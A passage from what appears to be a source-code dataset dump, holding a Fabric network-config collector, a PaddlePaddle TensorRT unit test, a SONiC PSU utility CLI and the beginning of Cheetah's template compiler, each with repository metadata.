"MIT"
] | null | null | null | fabfile/config.py | kurochan/config-collector | 656da97eb219eb5bcf913173dd7aa76d0cedd44c | [
"MIT"
] | 1 | 2015-03-01T08:52:14.000Z | 2015-03-01T08:52:14.000Z | # -*- coding: utf-8 -*-
import os
import util
from fabric.api import *
from fabric.state import output
from fabric.colors import *
from base import BaseTask
from helper.print_helper import task_puts
class CollectConfig(BaseTask):
"""
collect configuration
"""
name = "collect"
def run_task(self, *args, **kwargs):
host_config = env.inventory.get_variables(env.host)
hostname = host_config['ssh_host']
if not util.tcping(hostname, 22, 1):
task_puts("host {0} does not exist. skip...".format(hostname))
return
config = self.get_config(hostname, host_config['ssh_user'], host_config['ssh_pass'], host_config['exec_pass'], host_config['type'])
self.write_config(env.host, config)
# print config
def get_config(self, hostname, ssh_user, ssh_pass, exec_pass, os_type):
script_name = "dump-config-cisco-{0}.sh".format(os_type)
config = local(os.path.dirname(os.path.abspath(__file__)) + "/../bin/{0} {1} {2} {3}".format(script_name, ssh_user, hostname, ssh_pass), capture = True)
return config
def write_config(self, hostname, config):
output_dir = os.path.dirname(os.path.abspath(__file__)) + "/../tmp/config"
local("mkdir -p {0}".format(output_dir))
file = open("{0}/{1}.txt".format(output_dir, hostname), 'w')
file.write(str(config))
file.close()
collect = CollectConfig()
| 33.121951 | 156 | 0.690722 | 194 | 1,358 | 4.634021 | 0.386598 | 0.077864 | 0.043382 | 0.046719 | 0.066741 | 0.066741 | 0.066741 | 0 | 0 | 0 | 0 | 0.011314 | 0.153903 | 1,358 | 40 | 157 | 33.95 | 0.771105 | 0.041973 | 0 | 0 | 0 | 0 | 0.125 | 0.018634 | 0 | 0 | 0 | 0 | 0 | 1 | 0.107143 | false | 0.107143 | 0.25 | 0 | 0.5 | 0.035714 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
4661333ffeca10b7026c68a47b44fc3be83ff093 | 2,334 | py | Python | python/paddle/fluid/tests/unittests/ir/inference/test_trt_transpose_flatten_concat_fuse_pass.py | LWhite027/PaddleBox | b14bcdf285dd8829e11ab12cc815ac1b1ab62694 | [
"Apache-2.0"
] | 10 | 2021-05-12T07:20:32.000Z | 2022-03-04T08:21:56.000Z | python/paddle/fluid/tests/unittests/ir/inference/test_trt_transpose_flatten_concat_fuse_pass.py | AFLee/Paddle | 311b3b44fc7d51d4d66d90ab8a3fc0d42231afda | [
"Apache-2.0"
] | 1 | 2020-09-10T09:05:52.000Z | 2020-09-10T09:06:22.000Z | python/paddle/fluid/tests/unittests/ir/inference/test_trt_transpose_flatten_concat_fuse_pass.py | AFLee/Paddle | 311b3b44fc7d51d4d66d90ab8a3fc0d42231afda | [
"Apache-2.0"
] | 25 | 2019-12-07T02:14:14.000Z | 2021-12-30T06:16:30.000Z | # Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
import numpy as np
from inference_pass_test import InferencePassTest
import paddle.fluid as fluid
import paddle.fluid.core as core
from paddle.fluid.core import AnalysisConfig
class TransposeFlattenConcatFusePassTRTTest(InferencePassTest):
def setUp(self):
with fluid.program_guard(self.main_program, self.startup_program):
data1 = fluid.data(
name="data1", shape=[8, 32, 128], dtype="float32")
data2 = fluid.data(
name="data2", shape=[8, 32, 128], dtype="float32")
trans1 = fluid.layers.transpose(data1, perm=[2, 1, 0])
trans2 = fluid.layers.transpose(data2, perm=[2, 1, 0])
flatt1 = fluid.layers.flatten(trans1)
flatt2 = fluid.layers.flatten(trans2)
concat_out = fluid.layers.concat([flatt1, flatt2])
# There is no parameters for above structure.
# Hence, append a batch_norm to avoid failure caused by load_combined.
out = fluid.layers.batch_norm(concat_out, is_test=True)
self.feeds = {
"data1": np.random.random([8, 32, 128]).astype("float32"),
"data2": np.random.random([8, 32, 128]).astype("float32")
}
self.enable_trt = True
self.trt_parameters = TransposeFlattenConcatFusePassTRTTest.TensorRTParam(
1 << 20, 8, 3, AnalysisConfig.Precision.Float32, False, False)
self.fetch_list = [out]
def test_check_output(self):
# There is no cpu pass for transpose_flatten_concat_fuse
if core.is_compiled_with_cuda():
use_gpu = True
self.check_output_with_option(use_gpu)
if __name__ == "__main__":
unittest.main()
| 40.947368 | 83 | 0.673522 | 303 | 2,334 | 5.072607 | 0.481848 | 0.039037 | 0.015615 | 0.02082 | 0.072869 | 0.072869 | 0.042941 | 0.042941 | 0 | 0 | 0 | 0.038462 | 0.231362 | 2,334 | 56 | 84 | 41.678571 | 0.818283 | 0.322622 | 0 | 0 | 0 | 0 | 0.035806 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.060606 | false | 0.090909 | 0.181818 | 0 | 0.272727 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
4662eb3534b543f9d1857e55e3d0e8669cf078e7 | 9,315 | py | Python | pddf_psuutil/main.py | deran1980/sonic-utilities | a6ae218238e7e552f49191f81451bd55ff56ba51 | [
"Apache-2.0"
] | null | null | null | pddf_psuutil/main.py | deran1980/sonic-utilities | a6ae218238e7e552f49191f81451bd55ff56ba51 | [
"Apache-2.0"
] | 4 | 2020-04-17T06:53:05.000Z | 2020-12-01T02:37:34.000Z | pddf_psuutil/main.py | deran1980/sonic-utilities | a6ae218238e7e552f49191f81451bd55ff56ba51 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python3
#
# main.py
#
# Command-line utility for interacting with PSU Controller in PDDF mode in SONiC
#
try:
import sys
import os
import click
from tabulate import tabulate
from utilities_common.util_base import UtilHelper
except ImportError as e:
raise ImportError("%s - required module not found" % str(e))
VERSION = '2.0'
SYSLOG_IDENTIFIER = "psuutil"
PLATFORM_SPECIFIC_MODULE_NAME = "psuutil"
PLATFORM_SPECIFIC_CLASS_NAME = "PsuUtil"
# Global platform-specific psuutil class instance
platform_psuutil = None
platform_chassis = None
# Wrapper APIs so that this util is suited to both 1.0 and 2.0 platform APIs
def _wrapper_get_num_psus():
if platform_chassis is not None:
try:
return platform_chassis.get_num_psus()
except NotImplementedError:
pass
return platform_psuutil.get_num_psus()
def _wrapper_get_psu_name(idx):
if platform_chassis is not None:
try:
return platform_chassis.get_psu(idx-1).get_name()
except NotImplementedError:
pass
return "PSU {}".format(idx)
def _wrapper_get_psu_presence(idx):
if platform_chassis is not None:
try:
return platform_chassis.get_psu(idx-1).get_presence()
except NotImplementedError:
pass
return platform_psuutil.get_psu_presence(idx)
def _wrapper_get_psu_status(idx):
if platform_chassis is not None:
try:
return platform_chassis.get_psu(idx-1).get_status()
except NotImplementedError:
pass
return platform_psuutil.get_psu_status(idx)
def _wrapper_get_psu_model(idx):
if platform_chassis is not None:
try:
return platform_chassis.get_psu(idx-1).get_model()
except NotImplementedError:
pass
return platform_psuutil.get_model(idx)
def _wrapper_get_psu_mfr_id(idx):
if platform_chassis is not None:
try:
return platform_chassis.get_psu(idx-1).get_mfr_id()
except NotImplementedError:
pass
return platform_psuutil.get_mfr_id(idx)
def _wrapper_get_psu_serial(idx):
if platform_chassis is not None:
try:
return platform_chassis.get_psu(idx-1).get_serial()
except NotImplementedError:
pass
return platform_psuutil.get_serial(idx)
def _wrapper_get_psu_direction(idx):
if platform_chassis is not None:
try:
return platform_chassis.get_psu(idx-1)._fan_list[0].get_direction()
except NotImplementedError:
pass
return platform_psuutil.get_direction(idx)
def _wrapper_get_output_voltage(idx):
if platform_chassis is not None:
try:
return platform_chassis.get_psu(idx-1).get_voltage()
except NotImplementedError:
pass
return platform_psuutil.get_output_voltage(idx)
def _wrapper_get_output_current(idx):
if platform_chassis is not None:
try:
return platform_chassis.get_psu(idx-1).get_current()
except NotImplementedError:
pass
return platform_psuutil.get_output_current(idx)
def _wrapper_get_output_power(idx):
if platform_chassis is not None:
try:
return platform_chassis.get_psu(idx-1).get_power()
except NotImplementedError:
pass
return platform_psuutil.get_output_power(idx)
def _wrapper_get_fan_rpm(idx, fan_idx):
if platform_chassis is not None:
try:
return platform_chassis.get_psu(idx-1)._fan_list[fan_idx-1].get_speed_rpm()
except NotImplementedError:
pass
return platform_psuutil.get_fan_rpm(idx, fan_idx)
def _wrapper_dump_sysfs(idx):
if platform_chassis is not None:
try:
return platform_chassis.get_psu(idx).dump_sysfs()
except NotImplementedError:
pass
return platform_psuutil.dump_sysfs()
# ==================== CLI commands and groups ====================
# This is our main entrypoint - the main 'psuutil' command
@click.group()
def cli():
"""psuutil - Command line utility for providing PSU status"""
global platform_psuutil
global platform_chassis
if os.geteuid() != 0:
click.echo("Root privileges are required for this operation")
sys.exit(1)
# Load the helper class
helper = UtilHelper()
if not helper.check_pddf_mode():
click.echo("PDDF mode should be supported and enabled for this platform for this operation")
sys.exit(1)
# Load new platform api class
try:
import sonic_platform.platform
platform_chassis = sonic_platform.platform.Platform().get_chassis()
except Exception as e:
click.echo("Failed to load chassis due to {}".format(str(e)))
# Load platform-specific psuutil class if 2.0 implementation is not present
if platform_chassis is None:
try:
platform_psuutil = helper.load_platform_util(PLATFORM_SPECIFIC_MODULE_NAME, PLATFORM_SPECIFIC_CLASS_NAME)
except Exception as e:
click.echo("Failed to load {}: {}".format(PLATFORM_SPECIFIC_MODULE_NAME, str(e)))
sys.exit(2)
# 'version' subcommand
@cli.command()
def version():
"""Display version info"""
click.echo("PDDF psuutil version {0}".format(VERSION))
# 'numpsus' subcommand
@cli.command()
def numpsus():
"""Display number of supported PSUs on device"""
click.echo(_wrapper_get_num_psus())
# 'status' subcommand
@cli.command()
@click.option('-i', '--index', default=-1, type=int, help="the index of PSU")
def status(index):
"""Display PSU status"""
supported_psu = list(range(1, _wrapper_get_num_psus() + 1))
psu_ids = []
if (index < 0):
psu_ids = supported_psu
else:
psu_ids = [index]
header = ['PSU', 'Status']
status_table = []
for psu in psu_ids:
msg = ""
psu_name = _wrapper_get_psu_name(psu)
if psu not in supported_psu:
click.echo("Error! The {} is not available on the platform.\n" \
"Number of supported PSU - {}.".format(psu_name, len(supported_psu)))
continue
presence = _wrapper_get_psu_presence(psu)
if presence:
oper_status = _wrapper_get_psu_status(psu)
msg = 'OK' if oper_status else "NOT OK"
else:
msg = 'NOT PRESENT'
status_table.append([psu_name, msg])
if status_table:
click.echo(tabulate(status_table, header, tablefmt="simple"))
# 'mfrinfo' subcommand
@cli.command()
@click.option('-i', '--index', default=-1, type=int, help="the index of PSU")
def mfrinfo(index):
"""Display PSU manufacturer info"""
supported_psu = list(range(1, _wrapper_get_num_psus() + 1))
psu_ids = []
if (index < 0):
psu_ids = supported_psu
else:
psu_ids = [index]
for psu in psu_ids:
psu_name = _wrapper_get_psu_name(psu)
if psu not in supported_psu:
click.echo("Error! The {} is not available on the platform.\n" \
"Number of supported PSU - {}.".format(psu_name, len(supported_psu)))
continue
status = _wrapper_get_psu_status(psu)
if not status:
click.echo("{} is Not OK\n".format(psu_name))
continue
model_name = _wrapper_get_psu_model(psu)
mfr_id = _wrapper_get_psu_mfr_id(psu)
serial_num = _wrapper_get_psu_serial(psu)
airflow_dir = _wrapper_get_psu_direction(psu)
click.echo("{} is OK\nManufacture Id: {}\n" \
"Model: {}\nSerial Number: {}\n" \
"Fan Direction: {}\n".format(psu_name, mfr_id, model_name, serial_num, airflow_dir.capitalize()))
# 'seninfo' subcommand
@cli.command()
@click.option('-i', '--index', default=-1, type=int, help="the index of PSU")
def seninfo(index):
"""Display PSU sensor info"""
supported_psu = list(range(1, _wrapper_get_num_psus() + 1))
psu_ids = []
if (index < 0):
psu_ids = supported_psu
else:
psu_ids = [index]
for psu in psu_ids:
psu_name = _wrapper_get_psu_name(psu)
if psu not in supported_psu:
click.echo("Error! The {} is not available on the platform.\n" \
"Number of supported PSU - {}.".format(psu_name, len(supported_psu)))
continue
oper_status = _wrapper_get_psu_status(psu)
if not oper_status:
click.echo("{} is Not OK\n".format(psu_name))
continue
v_out = _wrapper_get_output_voltage(psu) * 1000
i_out = _wrapper_get_output_current(psu) * 1000
p_out = _wrapper_get_output_power(psu) * 1000
fan1_rpm = _wrapper_get_fan_rpm(psu, 1)
click.echo("{} is OK\nOutput Voltage: {} mv\n" \
"Output Current: {} ma\nOutput Power: {} mw\n" \
"Fan1 Speed: {} rpm\n".format(psu_name, v_out, i_out, p_out, fan1_rpm))
@cli.group()
def debug():
"""pddf_psuutil debug commands"""
pass
@debug.command()
def dump_sysfs():
"""Dump all PSU related SysFS paths"""
for psu in range(_wrapper_get_num_psus()):
status = _wrapper_dump_sysfs(psu)
if status:
for i in status:
click.echo(i)
if __name__ == '__main__':
cli()
| 31.05 | 117 | 0.646914 | 1,221 | 9,315 | 4.665029 | 0.143325 | 0.05618 | 0.041081 | 0.046699 | 0.541784 | 0.495611 | 0.481566 | 0.409586 | 0.347261 | 0.333567 | 0 | 0.0079 | 0.252603 | 9,315 | 299 | 118 | 31.153846 | 0.810256 | 0.089748 | 0 | 0.495536 | 0 | 0 | 0.097019 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.09375 | false | 0.0625 | 0.035714 | 0 | 0.245536 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
4669e171fec58193272f58bd7b305ba7d5f7aed0 | 78,232 | py | Python | lib/rabbitmq-dotnet-client-rabbitmq_v3_4_4/docs/pyle2-fcfcf7e/Cheetah/Compiler.py | CymaticLabs/Unity3d.Amqp | 42ca5de66fcda21ef6a4040bade99118b2ad6374 | [
"MIT"
] | 83 | 2017-03-15T12:43:25.000Z | 2022-03-31T12:38:44.000Z | lib/rabbitmq-dotnet-client-rabbitmq_v3_4_4/docs/pyle2-fcfcf7e/Cheetah/Compiler.py | CymaticLabs/Unity3d.Amqp | 42ca5de66fcda21ef6a4040bade99118b2ad6374 | [
"MIT"
] | 18 | 2017-03-20T14:12:58.000Z | 2021-07-28T09:11:55.000Z | lib/rabbitmq-dotnet-client-rabbitmq_v3_4_4/docs/pyle2-fcfcf7e/Cheetah/Compiler.py | CymaticLabs/Unity3d.Amqp | 42ca5de66fcda21ef6a4040bade99118b2ad6374 | [
"MIT"
] | 25 | 2017-04-01T01:40:02.000Z | 2022-02-20T11:08:12.000Z | #!/usr/bin/env python
# $Id: Compiler.py,v 1.148 2006/06/22 00:18:22 tavis_rudd Exp $
"""Compiler classes for Cheetah:
ModuleCompiler aka 'Compiler'
ClassCompiler
MethodCompiler
If you are trying to grok this code start with ModuleCompiler.__init__,
ModuleCompiler.compile, and ModuleCompiler.__getattr__.
Meta-Data
================================================================================
Author: Tavis Rudd <tavis@damnsimple.com>
Version: $Revision: 1.148 $
Start Date: 2001/09/19
Last Revision Date: $Date: 2006/06/22 00:18:22 $
"""
__author__ = "Tavis Rudd <tavis@damnsimple.com>"
__revision__ = "$Revision: 1.148 $"[11:-2]
import sys
import os
import os.path
from os.path import getmtime, exists
import re
import types
import time
import random
import warnings
import __builtin__
import copy
from Cheetah.Version import Version, VersionTuple
from Cheetah.SettingsManager import SettingsManager
from Cheetah.Parser import Parser, ParseError, specialVarRE, \
STATIC_CACHE, REFRESH_CACHE, SET_LOCAL, SET_GLOBAL,SET_MODULE
from Cheetah.Utils.Indenter import indentize # an undocumented preprocessor
from Cheetah import ErrorCatchers
from Cheetah import NameMapper
from Cheetah.NameMapper import NotFound, valueForName, valueFromSearchList, valueFromFrameOrSearchList
VFFSL=valueFromFrameOrSearchList
VFSL=valueFromSearchList
VFN=valueForName
currentTime=time.time
class Error(Exception): pass
DEFAULT_COMPILER_SETTINGS = {
## controlling the handling of Cheetah $placeholders
'useNameMapper': True, # Unified dotted notation and the searchList
'useSearchList': True, # if false, assume the first
# portion of the $variable (before the first dot) is a global,
# builtin, or local var that doesn't need
# looking up in the searchlist BUT use
# namemapper on the rest of the lookup
'allowSearchListAsMethArg': True,
'useAutocalling': True, # detect and call callable()'s, requires NameMapper
'useStackFrames': True, # use NameMapper.valueFromFrameOrSearchList
# rather than NameMapper.valueFromSearchList
'useErrorCatcher':False,
'alwaysFilterNone':True, # filter out None, before the filter is called
'useFilters':True, # use str instead if =False
'includeRawExprInFilterArgs':True,
#'lookForTransactionAttr':False,
'autoAssignDummyTransactionToSelf':False,
'useKWsDictArgForPassingTrans':True,
## controlling the aesthetic appearance / behaviour of generated code
'commentOffset': 1,
# should shorter str constant chunks be printed using repr rather than ''' quotes
'reprShortStrConstants': True,
'reprNewlineThreshold':3,
'outputRowColComments':True,
# should #block's be wrapped in a comment in the template's output
'includeBlockMarkers': False,
'blockMarkerStart':('\n<!-- START BLOCK: ',' -->\n'),
'blockMarkerEnd':('\n<!-- END BLOCK: ',' -->\n'),
'defDocStrMsg':'Autogenerated by CHEETAH: The Python-Powered Template Engine',
'setup__str__method': False,
'mainMethodName':'respond',
'mainMethodNameForSubclasses':'writeBody',
'indentationStep': ' '*4,
'initialMethIndentLevel': 2,
'monitorSrcFile':False,
'outputMethodsBeforeAttributes': True,
## customizing the #extends directive
'autoImportForExtendsDirective':True,
'handlerForExtendsDirective':None, # baseClassName = handler(compiler, baseClassName)
# a callback hook for customizing the
# #extends directive. It can manipulate
# the compiler's state if needed.
# also see allowExpressionsInExtendsDirective
# input filtering/restriction
# use lower case keys here!!
'disabledDirectives':[], # list of directive keys, without the start token
'enabledDirectives':[], # list of directive keys, without the start token
'disabledDirectiveHooks':[], # callable(parser, directiveKey)
'preparseDirectiveHooks':[], # callable(parser, directiveKey)
'postparseDirectiveHooks':[], # callable(parser, directiveKey)
'preparsePlaceholderHooks':[], # callable(parser)
'postparsePlaceholderHooks':[], # callable(parser)
# the above hooks don't need to return anything
'expressionFilterHooks':[], # callable(parser, expr, exprType, rawExpr=None, startPos=None)
# exprType is the name of the directive, 'psp', or 'placeholder'. all
# lowercase. The filters *must* return the expr or raise an exception.
# They can modify the expr if needed.
'templateMetaclass':None, # strictly optional. Only works with new-style baseclasses
'i18NFunctionName':'self.i18n',
## These are used in the parser, but I've put them here for the time being to
## facilitate separating the parser and compiler:
'cheetahVarStartToken':'$',
'commentStartToken':'##',
'multiLineCommentStartToken':'#*',
'multiLineCommentEndToken':'*#',
'gobbleWhitespaceAroundMultiLineComments':True,
'directiveStartToken':'#',
'directiveEndToken':'#',
'allowWhitespaceAfterDirectiveStartToken':False,
'PSPStartToken':'<%',
'PSPEndToken':'%>',
'EOLSlurpToken':'#',
'gettextTokens': ["_", "N_", "ngettext"],
'allowExpressionsInExtendsDirective': False, # the default restricts it to
# accepting dotted names
'allowEmptySingleLineMethods': False,
'allowNestedDefScopes': True,
'allowPlaceholderFilterArgs': True,
## See Parser.initDirectives() for the use of the next 3
#'directiveNamesAndParsers':{}
#'endDirectiveNamesAndHandlers':{}
#'macroDirectives':{}
}
class GenUtils:
"""An abstract baseclass for the Compiler classes that provides methods that
perform generic utility functions or generate pieces of output code from
information passed in by the Parser baseclass. These methods don't do any
parsing themselves.
"""
def genTimeInterval(self, timeString):
##@@ TR: need to add some error handling here
if timeString[-1] == 's':
interval = float(timeString[:-1])
elif timeString[-1] == 'm':
interval = float(timeString[:-1])*60
elif timeString[-1] == 'h':
interval = float(timeString[:-1])*60*60
elif timeString[-1] == 'd':
interval = float(timeString[:-1])*60*60*24
elif timeString[-1] == 'w':
interval = float(timeString[:-1])*60*60*24*7
else: # default to minutes
interval = float(timeString)*60
return interval
def genCacheInfo(self, cacheTokenParts):
"""Decipher a placeholder cachetoken
"""
cacheInfo = {}
if cacheTokenParts['REFRESH_CACHE']:
cacheInfo['type'] = REFRESH_CACHE
cacheInfo['interval'] = self.genTimeInterval(cacheTokenParts['interval'])
elif cacheTokenParts['STATIC_CACHE']:
cacheInfo['type'] = STATIC_CACHE
return cacheInfo # is empty if no cache
def genCacheInfoFromArgList(self, argList):
cacheInfo = {'type':REFRESH_CACHE}
for key, val in argList:
if val[0] in '"\'':
val = val[1:-1]
if key == 'timer':
key = 'interval'
val = self.genTimeInterval(val)
cacheInfo[key] = val
return cacheInfo
def genCheetahVar(self, nameChunks, plain=False):
if nameChunks[0][0] in self.setting('gettextTokens'):
self.addGetTextVar(nameChunks)
if self.setting('useNameMapper') and not plain:
return self.genNameMapperVar(nameChunks)
else:
return self.genPlainVar(nameChunks)
def addGetTextVar(self, nameChunks):
"""Output something that gettext can recognize.
This is a harmless side effect necessary to make gettext work when it
is scanning compiled templates for strings marked for translation.
@@TR: another marginally more efficient approach would be to put the
output in a dummy method that is never called.
"""
# @@TR: this should be in the compiler not here
self.addChunk("if False:")
self.indent()
self.addChunk(self.genPlainVar(nameChunks[:]))
self.dedent()
def genPlainVar(self, nameChunks):
"""Generate Python code for a Cheetah $var without using NameMapper
(Unified Dotted Notation with the SearchList).
"""
nameChunks.reverse()
chunk = nameChunks.pop()
pythonCode = chunk[0] + chunk[2]
while nameChunks:
chunk = nameChunks.pop()
pythonCode = (pythonCode + '.' + chunk[0] + chunk[2])
return pythonCode
def genNameMapperVar(self, nameChunks):
"""Generate valid Python code for a Cheetah $var, using NameMapper
(Unified Dotted Notation with the SearchList).
nameChunks = list of var subcomponents represented as tuples
[ (name,useAC,remainderOfExpr),
]
where:
name = the dotted name base
useAC = where NameMapper should use autocalling on namemapperPart
remainderOfExpr = any arglist, index, or slice
If remainderOfExpr contains a call arglist (e.g. '(1234)') then useAC
is False, otherwise it defaults to True. It is overridden by the global
setting 'useAutocalling' if this setting is False.
EXAMPLE
------------------------------------------------------------------------
if the raw Cheetah Var is
$a.b.c[1].d().x.y.z
nameChunks is the list
[ ('a.b.c',True,'[1]'), # A
('d',False,'()'), # B
('x.y.z',True,''), # C
]
When this method is fed the list above it returns
VFN(VFN(VFFSL(SL, 'a.b.c',True)[1], 'd',False)(), 'x.y.z',True)
which can be represented as
VFN(B`, name=C[0], executeCallables=(useAC and C[1]))C[2]
where:
VFN = NameMapper.valueForName
VFFSL = NameMapper.valueFromFrameOrSearchList
VFSL = NameMapper.valueFromSearchList # optionally used instead of VFFSL
SL = self.searchList()
useAC = self.setting('useAutocalling') # True in this example
A = ('a.b.c',True,'[1]')
B = ('d',False,'()')
C = ('x.y.z',True,'')
C` = VFN( VFN( VFFSL(SL, 'a.b.c',True)[1],
'd',False)(),
'x.y.z',True)
= VFN(B`, name='x.y.z', executeCallables=True)
B` = VFN(A`, name=B[0], executeCallables=(useAC and B[1]))B[2]
A` = VFFSL(SL, name=A[0], executeCallables=(useAC and A[1]))A[2]
Note, if the compiler setting useStackFrames=False (default is true)
then
A` = VFSL([locals()]+SL+[globals(), __builtin__], name=A[0], executeCallables=(useAC and A[1]))A[2]
This option allows Cheetah to be used with Psyco, which doesn't support
stack frame introspection.
"""
defaultUseAC = self.setting('useAutocalling')
useSearchList = self.setting('useSearchList')
nameChunks.reverse()
name, useAC, remainder = nameChunks.pop()
if not useSearchList:
firstDotIdx = name.find('.')
if firstDotIdx != -1 and firstDotIdx < len(name):
beforeFirstDot, afterDot = name[:firstDotIdx], name[firstDotIdx+1:]
pythonCode = ('VFN(' + beforeFirstDot +
',"' + afterDot +
'",' + repr(defaultUseAC and useAC) + ')'
+ remainder)
else:
pythonCode = name+remainder
elif self.setting('useStackFrames'):
pythonCode = ('VFFSL(SL,'
'"'+ name + '",'
+ repr(defaultUseAC and useAC) + ')'
+ remainder)
else:
pythonCode = ('VFSL([locals()]+SL+[globals(), __builtin__],'
'"'+ name + '",'
+ repr(defaultUseAC and useAC) + ')'
+ remainder)
##
while nameChunks:
name, useAC, remainder = nameChunks.pop()
pythonCode = ('VFN(' + pythonCode +
',"' + name +
'",' + repr(defaultUseAC and useAC) + ')'
+ remainder)
return pythonCode
##################################################
## METHOD COMPILERS
class MethodCompiler(GenUtils):
def __init__(self, methodName, classCompiler,
initialMethodComment=None,
decorator=None):
self._settingsManager = classCompiler
self._classCompiler = classCompiler
self._moduleCompiler = classCompiler._moduleCompiler
self._methodName = methodName
self._initialMethodComment = initialMethodComment
self._setupState()
self._decorator = decorator
def setting(self, key):
return self._settingsManager.setting(key)
def _setupState(self):
self._indent = self.setting('indentationStep')
self._indentLev = self.setting('initialMethIndentLevel')
self._pendingStrConstChunks = []
self._methodSignature = None
self._methodDef = None
self._docStringLines = []
self._methodBodyChunks = []
self._cacheRegionsStack = []
self._callRegionsStack = []
self._captureRegionsStack = []
self._filterRegionsStack = []
self._isErrorCatcherOn = False
self._hasReturnStatement = False
self._isGenerator = False
def cleanupState(self):
"""Called by the containing class compiler instance
"""
pass
def methodName(self):
return self._methodName
def setMethodName(self, name):
self._methodName = name
## methods for managing indentation
def indentation(self):
return self._indent * self._indentLev
def indent(self):
self._indentLev +=1
def dedent(self):
if self._indentLev:
self._indentLev -=1
else:
raise Error('Attempt to dedent when the indentLev is 0')
## methods for final code wrapping
def methodDef(self):
if self._methodDef:
return self._methodDef
else:
return self.wrapCode()
__str__ = methodDef
def wrapCode(self):
self.commitStrConst()
methodDefChunks = (
self.methodSignature(),
'\n',
self.docString(),
self.methodBody() )
methodDef = ''.join(methodDefChunks)
self._methodDef = methodDef
return methodDef
def methodSignature(self):
return self._indent + self._methodSignature + ':'
def setMethodSignature(self, signature):
self._methodSignature = signature
def methodBody(self):
return ''.join( self._methodBodyChunks )
def docString(self):
if not self._docStringLines:
return ''
ind = self._indent*2
docStr = (ind + '"""\n' + ind +
('\n' + ind).join([ln.replace('"""',"'''") for ln in self._docStringLines]) +
'\n' + ind + '"""\n')
return docStr
## methods for adding code
def addMethDocString(self, line):
self._docStringLines.append(line.replace('%','%%'))
def addChunk(self, chunk):
self.commitStrConst()
chunk = "\n" + self.indentation() + chunk
self._methodBodyChunks.append(chunk)
def appendToPrevChunk(self, appendage):
self._methodBodyChunks[-1] = self._methodBodyChunks[-1] + appendage
def addWriteChunk(self, chunk):
self.addChunk('write(' + chunk + ')')
def addFilteredChunk(self, chunk, filterArgs=None, rawExpr=None, lineCol=None):
if filterArgs is None:
filterArgs = ''
if self.setting('includeRawExprInFilterArgs') and rawExpr:
filterArgs += ', rawExpr=%s'%repr(rawExpr)
if self.setting('alwaysFilterNone'):
if rawExpr and rawExpr.find('\n')==-1 and rawExpr.find('\r')==-1:
self.addChunk("_v = %s # %r"%(chunk, rawExpr))
if lineCol:
self.appendToPrevChunk(' on line %s, col %s'%lineCol)
else:
self.addChunk("_v = %s"%chunk)
if self.setting('useFilters'):
self.addChunk("if _v is not None: write(_filter(_v%s))"%filterArgs)
else:
self.addChunk("if _v is not None: write(str(_v))")
else:
if self.setting('useFilters'):
self.addChunk("write(_filter(%s%s))"%(chunk,filterArgs))
else:
self.addChunk("write(str(%s))"%chunk)
def _appendToPrevStrConst(self, strConst):
if self._pendingStrConstChunks:
self._pendingStrConstChunks.append(strConst)
else:
self._pendingStrConstChunks = [strConst]
def _unescapeCheetahVars(self, theString):
"""Unescape any escaped Cheetah \$vars in the string.
"""
token = self.setting('cheetahVarStartToken')
return theString.replace('\\' + token, token)
def _unescapeDirectives(self, theString):
"""Unescape any escaped Cheetah \$vars in the string.
"""
token = self.setting('directiveStartToken')
return theString.replace('\\' + token, token)
def commitStrConst(self):
"""Add the code for outputting the pending strConst without chopping off
any whitespace from it.
"""
if self._pendingStrConstChunks:
strConst = self._unescapeCheetahVars(''.join(self._pendingStrConstChunks))
strConst = self._unescapeDirectives(strConst)
self._pendingStrConstChunks = []
if not strConst:
return
if self.setting('reprShortStrConstants') and \
strConst.count('\n') < self.setting('reprNewlineThreshold'):
self.addWriteChunk( repr(strConst).replace('\\012','\\n'))
else:
strConst = strConst.replace('\\','\\\\').replace("'''","'\'\'\'")
if strConst[0] == "'":
strConst = '\\' + strConst
if strConst[-1] == "'":
strConst = strConst[:-1] + '\\' + strConst[-1]
self.addWriteChunk("'''" + strConst + "'''" )
def handleWSBeforeDirective(self):
"""Truncate the pending strCont to the beginning of the current line.
"""
if self._pendingStrConstChunks:
src = self._pendingStrConstChunks[-1]
BOL = max(src.rfind('\n')+1, src.rfind('\r')+1, 0)
if BOL < len(src):
self._pendingStrConstChunks[-1] = src[:BOL]
def isErrorCatcherOn(self):
return self._isErrorCatcherOn
def turnErrorCatcherOn(self):
self._isErrorCatcherOn = True
def turnErrorCatcherOff(self):
self._isErrorCatcherOn = False
# @@TR: consider merging the next two methods into one
def addStrConst(self, strConst):
self._appendToPrevStrConst(strConst)
def addRawText(self, text):
self.addStrConst(text)
def addMethComment(self, comm):
offSet = self.setting('commentOffset')
self.addChunk('#' + ' '*offSet + comm)
def addPlaceholder(self, expr, filterArgs, rawPlaceholder,
cacheTokenParts, lineCol,
silentMode=False):
cacheInfo = self.genCacheInfo(cacheTokenParts)
if cacheInfo:
cacheInfo['ID'] = repr(rawPlaceholder)[1:-1]
